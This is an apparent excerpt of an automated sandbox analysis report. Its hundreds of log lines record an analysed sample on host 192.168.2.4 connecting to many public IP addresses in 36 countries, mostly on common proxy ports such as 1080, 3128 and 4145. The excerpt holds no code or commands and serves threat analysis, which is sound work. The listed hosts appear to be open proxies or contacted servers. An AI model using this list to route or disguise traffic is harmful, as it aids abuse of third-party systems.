                    Source: unknownNetwork traffic detected: HTTP traffic on port 51563 -> 87
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50871 -> 17179
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50965 -> 32520
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51220 -> 53935
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51208 -> 46286
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 56225
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51371 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6161 -> 51151
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50661 -> 8090
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51588 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6467 -> 51138
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51586 -> 48963
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51625 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51419 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51596 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51604 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 20002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51431 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51564 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50044
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51615 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50994
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 50737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51598 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50780 -> 23031
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 8193
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51477 -> 8000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51430 -> 9091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50938 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51605 -> 1976
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51644 -> 63425
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51661 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51009 -> 34409
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51107 -> 63135
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 25295
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51574 -> 9999
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51368 -> 7302
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51627 -> 55215
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51040 -> 53397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51122 -> 38721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51324 -> 17970
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51275 -> 46097
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50783 -> 28134
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51261 -> 38338
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 53281 -> 50033
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51557 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 20074 -> 51144
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 8081
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 4153
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51706 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51680 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51295
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51314 -> 38242
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50767 -> 64556
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50857 -> 16379
                    Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 51195
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51691 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51700 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51631 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51662 -> 11
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 51062
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51590 -> 15393
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50817 -> 49687
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 49397
                    Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51269
                    Source: unknownNetwork traffic detected: HTTP traffic on port 8090 -> 50661
                    Source: unknownNetwork traffic detected: HTTP traffic on port 51725 -> 4154
                    Source: unknownNetwork traffic detected: IP country count 36
                    Source: global trafficTCP traffic: 192.168.2.4:49733 -> 107.181.148.187:6047
                    Source: global trafficTCP traffic: 192.168.2.4:49736 -> 181.209.113.234:1082
                    Source: global trafficTCP traffic: 192.168.2.4:49738 -> 81.17.94.50:34300
                    Source: global trafficTCP traffic: 192.168.2.4:49739 -> 107.148.99.107:58394
                    Source: global trafficTCP traffic: 192.168.2.4:49740 -> 159.223.71.71:49922
                    Source: global trafficTCP traffic: 192.168.2.4:49742 -> 128.199.221.91:12259
                    Source: global trafficTCP traffic: 192.168.2.4:49744 -> 221.231.13.198:1080
                    Source: global trafficTCP traffic: 192.168.2.4:49745 -> 103.124.198.118:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49746 -> 212.69.12.121:1080
                    Source: global trafficTCP traffic: 192.168.2.4:49747 -> 49.0.34.194:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49748 -> 160.153.245.187:5436
                    Source: global trafficTCP traffic: 192.168.2.4:49750 -> 104.238.111.107:30026
                    Source: global trafficTCP traffic: 192.168.2.4:49751 -> 222.124.130.198:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49752 -> 184.181.217.201:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49754 -> 154.202.123.46:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49755 -> 198.12.253.117:60406
                    Source: global trafficTCP traffic: 192.168.2.4:49756 -> 102.212.86.57:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49757 -> 168.227.40.66:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49758 -> 107.180.101.18:3663
                    Source: global trafficTCP traffic: 192.168.2.4:49760 -> 103.134.38.89:5678
                    Source: global trafficTCP traffic: 192.168.2.4:49761 -> 136.243.148.97:25928
                    Source: global trafficTCP traffic: 192.168.2.4:49762 -> 132.148.129.254:45366
                    Source: global trafficTCP traffic: 192.168.2.4:49763 -> 208.109.13.93:5190
                    Source: global trafficTCP traffic: 192.168.2.4:49764 -> 95.23.214.53:8085
                    Source: global trafficTCP traffic: 192.168.2.4:49765 -> 67.43.228.250:18681
                    Source: global trafficTCP traffic: 192.168.2.4:49766 -> 83.238.80.12:8081
                    Source: global trafficTCP traffic: 192.168.2.4:49768 -> 125.87.82.86:3256
                    Source: global trafficTCP traffic: 192.168.2.4:49769 -> 146.190.84.209:9445
                    Source: global trafficTCP traffic: 192.168.2.4:49770 -> 78.47.35.35:3312
                    Source: global trafficTCP traffic: 192.168.2.4:49772 -> 23.122.184.9:8888
                    Source: global trafficTCP traffic: 192.168.2.4:49773 -> 92.246.139.113:11201
                    Source: global trafficTCP traffic: 192.168.2.4:49774 -> 91.205.197.226:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49775 -> 139.99.9.218:17182
                    Source: global trafficTCP traffic: 192.168.2.4:49776 -> 88.199.164.140:8081
                    Source: global trafficTCP traffic: 192.168.2.4:49777 -> 51.158.105.107:16379
                    Source: global trafficTCP traffic: 192.168.2.4:49778 -> 137.184.15.145:8000
                    Source: global trafficTCP traffic: 192.168.2.4:49779 -> 185.132.179.72:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49780 -> 135.181.30.244:14645
                    Source: global trafficTCP traffic: 192.168.2.4:49782 -> 43.129.249.83:8888
                    Source: global trafficTCP traffic: 192.168.2.4:49784 -> 202.6.233.59:7878
                    Source: global trafficTCP traffic: 192.168.2.4:49785 -> 199.102.107.145:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49787 -> 199.102.105.242:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49788 -> 141.94.174.6:3601
                    Source: global trafficTCP traffic: 192.168.2.4:49789 -> 154.79.254.236:32650
                    Source: global trafficTCP traffic: 192.168.2.4:49790 -> 165.225.32.114:10417
                    Source: global trafficTCP traffic: 192.168.2.4:49792 -> 162.215.223.76:62691
                    Source: global trafficTCP traffic: 192.168.2.4:49793 -> 154.202.124.29:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49795 -> 177.87.250.66:999
                    Source: global trafficTCP traffic: 192.168.2.4:49796 -> 47.114.101.57:8888
                    Source: global trafficTCP traffic: 192.168.2.4:49798 -> 72.195.114.169:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49799 -> 103.214.112.238:32323
                    Source: global trafficTCP traffic: 192.168.2.4:49800 -> 200.116.198.222:9812
                    Source: global trafficTCP traffic: 192.168.2.4:49801 -> 67.43.227.227:12129
                    Source: global trafficTCP traffic: 192.168.2.4:49802 -> 103.155.54.38:83
                    Source: global trafficTCP traffic: 192.168.2.4:49803 -> 207.180.234.220:42823
                    Source: global trafficTCP traffic: 192.168.2.4:49805 -> 72.10.164.178:3021
                    Source: global trafficTCP traffic: 192.168.2.4:49807 -> 3.9.71.167:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49809 -> 104.248.151.220:51040
                    Source: global trafficTCP traffic: 192.168.2.4:49811 -> 213.252.245.221:6120
                    Source: global trafficTCP traffic: 192.168.2.4:49812 -> 182.93.69.74:5678
                    Source: global trafficTCP traffic: 192.168.2.4:49813 -> 50.63.13.3:11673
                    Source: global trafficTCP traffic: 192.168.2.4:49815 -> 13.234.24.116:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49816 -> 136.228.160.250:5678
                    Source: global trafficTCP traffic: 192.168.2.4:49817 -> 117.160.250.134:8899
                    Source: global trafficTCP traffic: 192.168.2.4:49818 -> 103.215.139.32:20056
                    Source: global trafficTCP traffic: 192.168.2.4:49819 -> 167.86.69.142:46859
                    Source: global trafficTCP traffic: 192.168.2.4:49820 -> 188.165.237.26:52982
                    Source: global trafficTCP traffic: 192.168.2.4:49821 -> 178.62.103.49:8587
                    Source: global trafficTCP traffic: 192.168.2.4:49822 -> 161.97.173.42:23670
                    Source: global trafficTCP traffic: 192.168.2.4:49823 -> 45.179.71.90:3180
                    Source: global trafficTCP traffic: 192.168.2.4:49824 -> 41.90.242.102:5678
                    Source: global trafficTCP traffic: 192.168.2.4:49826 -> 111.3.102.135:30001
                    Source: global trafficTCP traffic: 192.168.2.4:49827 -> 154.83.10.137:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49828 -> 103.247.21.98:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49829 -> 189.240.60.171:9090
                    Source: global trafficTCP traffic: 192.168.2.4:49830 -> 41.65.236.39:1976
                    Source: global trafficTCP traffic: 192.168.2.4:49832 -> 212.77.163.196:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49833 -> 167.172.86.46:10471
                    Source: global trafficTCP traffic: 192.168.2.4:49835 -> 107.178.9.186:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49836 -> 113.53.29.228:13629
                    Source: global trafficTCP traffic: 192.168.2.4:49838 -> 116.118.98.9:5678
                    Source: global trafficTCP traffic: 192.168.2.4:49839 -> 200.6.175.10:59341
                    Source: global trafficTCP traffic: 192.168.2.4:49840 -> 162.241.46.54:46849
                    Source: global trafficTCP traffic: 192.168.2.4:49842 -> 201.77.108.1:999
                    Source: global trafficTCP traffic: 192.168.2.4:49843 -> 201.174.175.82:999
                    Source: global trafficTCP traffic: 192.168.2.4:49844 -> 89.161.90.203:5678
                    Source: global trafficTCP traffic: 192.168.2.4:49846 -> 89.22.17.62:43110
                    Source: global trafficTCP traffic: 192.168.2.4:49847 -> 94.130.181.59:32770
                    Source: global trafficTCP traffic: 192.168.2.4:49848 -> 198.105.111.86:6764
                    Source: global trafficTCP traffic: 192.168.2.4:49849 -> 66.228.33.190:29466
                    Source: global trafficTCP traffic: 192.168.2.4:49850 -> 185.129.250.183:26777
                    Source: global trafficTCP traffic: 192.168.2.4:49851 -> 24.249.199.4:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49852 -> 188.235.0.207:8181
                    Source: global trafficTCP traffic: 192.168.2.4:49853 -> 46.101.102.134:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49854 -> 110.78.164.224:5678
                    Source: global trafficTCP traffic: 192.168.2.4:49855 -> 103.60.137.17:4153
                    Source: global trafficTCP traffic: 192.168.2.4:49857 -> 79.174.188.153:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49860 -> 51.83.190.248:19050
                    Source: global trafficTCP traffic: 192.168.2.4:49861 -> 102.132.54.151:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49862 -> 167.86.102.169:37379
                    Source: global trafficTCP traffic: 192.168.2.4:49863 -> 101.255.166.2:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49864 -> 72.37.216.68:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49865 -> 80.54.62.254:5678
                    Source: global trafficTCP traffic: 192.168.2.4:49867 -> 45.119.113.62:83
                    Source: global trafficTCP traffic: 192.168.2.4:49870 -> 91.149.224.168:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49871 -> 45.159.150.23:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49873 -> 41.65.55.10:1976
                    Source: global trafficTCP traffic: 192.168.2.4:49875 -> 94.131.107.45:1080
                    Source: global trafficTCP traffic: 192.168.2.4:49876 -> 162.241.46.40:49401
                    Source: global trafficTCP traffic: 192.168.2.4:49880 -> 103.163.80.14:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49882 -> 103.176.116.171:32650
                    Source: global trafficTCP traffic: 192.168.2.4:49884 -> 132.148.128.8:12519
                    Source: global trafficTCP traffic: 192.168.2.4:49885 -> 185.38.111.1:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49886 -> 37.187.143.172:47016
                    Source: global trafficTCP traffic: 192.168.2.4:49887 -> 198.57.195.42:31683
                    Source: global trafficTCP traffic: 192.168.2.4:49888 -> 94.232.11.178:58028
                    Source: global trafficTCP traffic: 192.168.2.4:49889 -> 109.123.254.43:51025
                    Source: global trafficTCP traffic: 192.168.2.4:49890 -> 166.62.87.148:42801
                    Source: global trafficTCP traffic: 192.168.2.4:49891 -> 142.93.151.99:45365
                    Source: global trafficTCP traffic: 192.168.2.4:49893 -> 166.62.53.45:56862
                    Source: global trafficTCP traffic: 192.168.2.4:49894 -> 51.77.73.67:31979
                    Source: global trafficTCP traffic: 192.168.2.4:49895 -> 171.97.12.175:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49896 -> 72.10.160.90:2589
                    Source: global trafficTCP traffic: 192.168.2.4:49897 -> 210.61.216.63:60808
                    Source: global trafficTCP traffic: 192.168.2.4:49898 -> 1.20.137.82:32241
                    Source: global trafficTCP traffic: 192.168.2.4:49899 -> 50.63.12.101:32423
                    Source: global trafficTCP traffic: 192.168.2.4:49900 -> 103.167.69.94:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49901 -> 221.226.109.229:7302
                    Source: global trafficTCP traffic: 192.168.2.4:49902 -> 46.109.146.244:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49904 -> 78.40.104.5:1080
                    Source: global trafficTCP traffic: 192.168.2.4:49906 -> 45.112.125.58:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49905 -> 104.164.183.187:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49907 -> 67.43.236.20:6095
                    Source: global trafficTCP traffic: 192.168.2.4:49908 -> 45.225.184.206:999
                    Source: global trafficTCP traffic: 192.168.2.4:49911 -> 171.226.88.162:54450
                    Source: global trafficTCP traffic: 192.168.2.4:49912 -> 91.135.80.66:33427
                    Source: global trafficTCP traffic: 192.168.2.4:49913 -> 175.106.10.227:7878
                    Source: global trafficTCP traffic: 192.168.2.4:49914 -> 41.128.148.78:1976
                    Source: global trafficTCP traffic: 192.168.2.4:49915 -> 182.18.140.17:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49916 -> 41.217.223.145:32650
                    Source: global trafficTCP traffic: 192.168.2.4:49918 -> 72.10.160.92:26077
                    Source: global trafficTCP traffic: 192.168.2.4:49920 -> 103.184.54.42:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49922 -> 195.138.90.226:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49923 -> 46.182.6.69:41041
                    Source: global trafficTCP traffic: 192.168.2.4:49924 -> 154.83.11.52:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49925 -> 103.141.109.237:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49926 -> 104.165.169.83:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49928 -> 161.97.147.193:1599
                    Source: global trafficTCP traffic: 192.168.2.4:49929 -> 120.197.40.219:9002
                    Source: global trafficTCP traffic: 192.168.2.4:49931 -> 72.167.221.145:53672
                    Source: global trafficTCP traffic: 192.168.2.4:49932 -> 138.197.92.110:21346
                    Source: global trafficTCP traffic: 192.168.2.4:49934 -> 45.233.67.226:999
                    Source: global trafficTCP traffic: 192.168.2.4:49936 -> 92.247.31.130:1080
                    Source: global trafficTCP traffic: 192.168.2.4:49937 -> 201.182.251.140:999
                    Source: global trafficTCP traffic: 192.168.2.4:49939 -> 103.76.104.30:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49940 -> 185.172.212.233:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49941 -> 208.87.131.151:49314
                    Source: global trafficTCP traffic: 192.168.2.4:49944 -> 67.43.227.228:5769
                    Source: global trafficTCP traffic: 192.168.2.4:49947 -> 117.57.93.135:8089
                    Source: global trafficTCP traffic: 192.168.2.4:49949 -> 23.225.72.125:3503
                    Source: global trafficTCP traffic: 192.168.2.4:49948 -> 148.66.130.53:12005
                    Source: global trafficTCP traffic: 192.168.2.4:49950 -> 168.227.158.41:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49951 -> 190.120.254.233:999
                    Source: global trafficTCP traffic: 192.168.2.4:49954 -> 190.113.40.202:999
                    Source: global trafficTCP traffic: 192.168.2.4:49955 -> 50.193.36.173:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49956 -> 118.67.216.94:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49957 -> 158.101.1.100:42171
                    Source: global trafficTCP traffic: 192.168.2.4:49958 -> 41.242.90.3:57520
                    Source: global trafficTCP traffic: 192.168.2.4:49959 -> 168.138.66.48:1080
                    Source: global trafficTCP traffic: 192.168.2.4:49960 -> 51.210.4.123:56238
                    Source: global trafficTCP traffic: 192.168.2.4:49961 -> 183.89.176.18:4153
                    Source: global trafficTCP traffic: 192.168.2.4:49962 -> 178.252.197.64:4153
                    Source: global trafficTCP traffic: 192.168.2.4:49964 -> 8.213.137.155:543
                    Source: global trafficTCP traffic: 192.168.2.4:49965 -> 117.69.236.86:8089
                    Source: global trafficTCP traffic: 192.168.2.4:49966 -> 74.119.147.209:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49967 -> 146.120.160.148:5678
                    Source: global trafficTCP traffic: 192.168.2.4:49968 -> 185.208.102.62:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49969 -> 103.126.173.163:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49970 -> 114.106.146.149:8089
                    Source: global trafficTCP traffic: 192.168.2.4:49971 -> 31.47.37.114:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49972 -> 138.68.24.185:46035
                    Source: global trafficTCP traffic: 192.168.2.4:49974 -> 152.67.10.190:8100
                    Source: global trafficTCP traffic: 192.168.2.4:49975 -> 103.86.1.34:4145
                    Source: global trafficTCP traffic: 192.168.2.4:49976 -> 201.229.250.21:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49977 -> 154.202.110.117:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49978 -> 188.132.222.168:10820
                    Source: global trafficTCP traffic: 192.168.2.4:49982 -> 72.10.160.170:1611
                    Source: global trafficTCP traffic: 192.168.2.4:49984 -> 107.182.142.17:1080
                    Source: global trafficTCP traffic: 192.168.2.4:49986 -> 78.38.93.22:3128
                    Source: global trafficTCP traffic: 192.168.2.4:49987 -> 103.46.8.15:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49988 -> 41.65.236.37:1976
                    Source: global trafficTCP traffic: 192.168.2.4:49990 -> 47.251.34.170:1080
                    Source: global trafficTCP traffic: 192.168.2.4:49991 -> 45.11.96.41:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49992 -> 65.49.82.7:46770
                    Source: global trafficTCP traffic: 192.168.2.4:49993 -> 125.26.22.7:5678
                    Source: global trafficTCP traffic: 192.168.2.4:49994 -> 67.43.228.253:14313
                    Source: global trafficTCP traffic: 192.168.2.4:49995 -> 206.189.15.100:54330
                    Source: global trafficTCP traffic: 192.168.2.4:49996 -> 150.107.136.110:8082
                    Source: global trafficTCP traffic: 192.168.2.4:49998 -> 83.126.54.155:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49999 -> 51.77.73.78:31979
                    Source: global trafficTCP traffic: 192.168.2.4:50000 -> 37.120.222.132:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50001 -> 129.146.45.163:31289
                    Source: global trafficTCP traffic: 192.168.2.4:50004 -> 154.202.108.37:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50005 -> 85.89.184.87:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50006 -> 130.193.123.34:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50007 -> 198.12.253.1:3820
                    Source: global trafficTCP traffic: 192.168.2.4:50009 -> 142.54.236.97:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50010 -> 212.174.79.165:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50011 -> 190.109.178.44:999
                    Source: global trafficTCP traffic: 192.168.2.4:50012 -> 125.229.149.168:65100
                    Source: global trafficTCP traffic: 192.168.2.4:50013 -> 168.205.217.171:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50014 -> 180.210.222.153:1080
                    Source: global trafficTCP traffic: 192.168.2.4:50015 -> 103.148.201.67:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50016 -> 201.71.2.115:999
                    Source: global trafficTCP traffic: 192.168.2.4:50017 -> 34.145.53.40:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50019 -> 187.188.169.169:59329
                    Source: global trafficTCP traffic: 192.168.2.4:50018 -> 209.250.230.101:9090
                    Source: global trafficTCP traffic: 192.168.2.4:50020 -> 181.113.34.86:48024
                    Source: global trafficTCP traffic: 192.168.2.4:50021 -> 103.84.235.162:8789
                    Source: global trafficTCP traffic: 192.168.2.4:50022 -> 45.7.177.85:52246
                    Source: global trafficTCP traffic: 192.168.2.4:50023 -> 78.47.103.89:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50024 -> 185.132.242.212:8083
                    Source: global trafficTCP traffic: 192.168.2.4:50025 -> 88.255.217.44:10820
                    Source: global trafficTCP traffic: 192.168.2.4:50027 -> 200.63.107.118:8089
                    Source: global trafficTCP traffic: 192.168.2.4:50028 -> 194.233.78.142:34471
                    Source: global trafficTCP traffic: 192.168.2.4:50029 -> 221.151.181.101:8000
                    Source: global trafficTCP traffic: 192.168.2.4:50030 -> 213.136.75.85:59058
                    Source: global trafficTCP traffic: 192.168.2.4:50031 -> 186.249.240.146:50733
                    Source: global trafficTCP traffic: 192.168.2.4:50032 -> 221.134.152.75:7302
                    Source: global trafficTCP traffic: 192.168.2.4:50033 -> 193.41.88.58:53281
                    Source: global trafficTCP traffic: 192.168.2.4:50035 -> 41.65.55.2:1976
                    Source: global trafficTCP traffic: 192.168.2.4:50036 -> 41.33.203.233:1975
                    Source: global trafficTCP traffic: 192.168.2.4:50037 -> 96.80.235.1:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50038 -> 77.233.5.68:55443
                    Source: global trafficTCP traffic: 192.168.2.4:50039 -> 195.206.39.222:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50040 -> 122.116.150.2:9000
                    Source: global trafficTCP traffic: 192.168.2.4:50042 -> 139.5.73.71:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50041 -> 180.131.242.221:48678
                    Source: global trafficTCP traffic: 192.168.2.4:50043 -> 185.105.230.45:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50044 -> 39.109.113.97:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50047 -> 47.243.177.210:8088
                    Source: global trafficTCP traffic: 192.168.2.4:50048 -> 77.235.19.2:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50049 -> 171.244.140.160:36273
                    Source: global trafficTCP traffic: 192.168.2.4:50051 -> 41.70.12.54:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50053 -> 176.88.177.197:61080
                    Source: global trafficTCP traffic: 192.168.2.4:50054 -> 196.219.202.74:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50056 -> 5.78.89.192:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50057 -> 107.181.168.145:4145
                    Source: global trafficTCP traffic: 192.168.2.4:50058 -> 27.111.83.207:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50059 -> 72.10.160.93:16703
                    Source: global trafficTCP traffic: 192.168.2.4:50060 -> 94.23.83.53:64817
                    Source: global trafficTCP traffic: 192.168.2.4:50062 -> 92.205.185.251:50539
                    Source: global trafficTCP traffic: 192.168.2.4:50063 -> 203.112.79.90:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50066 -> 93.230.164.47:1234
                    Source: global trafficTCP traffic: 192.168.2.4:50067 -> 154.202.96.103:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50068 -> 162.214.102.121:29430
                    Source: global trafficTCP traffic: 192.168.2.4:50070 -> 152.228.140.225:28119
                    Source: global trafficTCP traffic: 192.168.2.4:50072 -> 185.215.160.118:35010
                    Source: global trafficTCP traffic: 192.168.2.4:50073 -> 102.176.103.134:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50074 -> 107.180.89.55:25508
                    Source: global trafficTCP traffic: 192.168.2.4:50075 -> 5.196.111.30:20481
                    Source: global trafficTCP traffic: 192.168.2.4:50076 -> 109.127.82.114:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50078 -> 173.249.37.45:5005
                    Source: global trafficTCP traffic: 192.168.2.4:50077 -> 120.234.203.171:9002
                    Source: global trafficTCP traffic: 192.168.2.4:50079 -> 103.234.26.163:9990
                    Source: global trafficTCP traffic: 192.168.2.4:50080 -> 200.108.197.2:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50082 -> 154.236.179.226:1976
                    Source: global trafficTCP traffic: 192.168.2.4:50083 -> 188.164.196.30:49426
                    Source: global trafficTCP traffic: 192.168.2.4:50084 -> 154.202.98.133:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50087 -> 67.43.236.18:5089
                    Source: global trafficTCP traffic: 192.168.2.4:50088 -> 154.202.108.169:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50089 -> 45.225.207.183:999
                    Source: global trafficTCP traffic: 192.168.2.4:50090 -> 125.87.89.228:8089
                    Source: global trafficTCP traffic: 192.168.2.4:50091 -> 213.226.11.149:41878
                    Source: global trafficTCP traffic: 192.168.2.4:50093 -> 79.137.204.235:13722
                    Source: global trafficTCP traffic: 192.168.2.4:50094 -> 45.181.88.146:4153
                    Source: global trafficTCP traffic: 192.168.2.4:50095 -> 49.13.116.170:31602
                    Source: global trafficTCP traffic: 192.168.2.4:50099 -> 162.144.36.208:38242
                    Source: global trafficTCP traffic: 192.168.2.4:50100 -> 190.232.89.125:5678
                    Source: global trafficTCP traffic: 192.168.2.4:50101 -> 87.106.114.124:6005
                    Source: global trafficTCP traffic: 192.168.2.4:50102 -> 45.117.179.179:3547
                    Source: global trafficTCP traffic: 192.168.2.4:50103 -> 154.202.112.186:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50104 -> 138.0.228.185:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50105 -> 178.33.252.189:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50107 -> 95.165.163.188:60103
                    Source: global trafficTCP traffic: 192.168.2.4:50106 -> 162.0.220.222:64731
                    Source: global trafficTCP traffic: 192.168.2.4:50109 -> 43.255.113.232:82
                    Source: global trafficTCP traffic: 192.168.2.4:50111 -> 92.246.139.112:11945
                    Source: global trafficTCP traffic: 192.168.2.4:50112 -> 186.192.195.211:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50115 -> 37.53.103.4:3128
                    Source: global trafficTCP traffic: 192.168.2.4:50116 -> 112.205.92.14:8080
                    Source: global trafficTCP traffic: 192.168.2.4:50117 -> 173.212.240.168:39180
                    Source: global trafficTCP traffic: 192.168.2.4:50121 -> 45.229.34.174:999
                    Source: global trafficTCP traffic: 192.168.2.4:50124 -> 201.238.248.139:9229
                    Source: global trafficTCP traffic: 192.168.2.4:50126 -> 103.162.31.91:33829
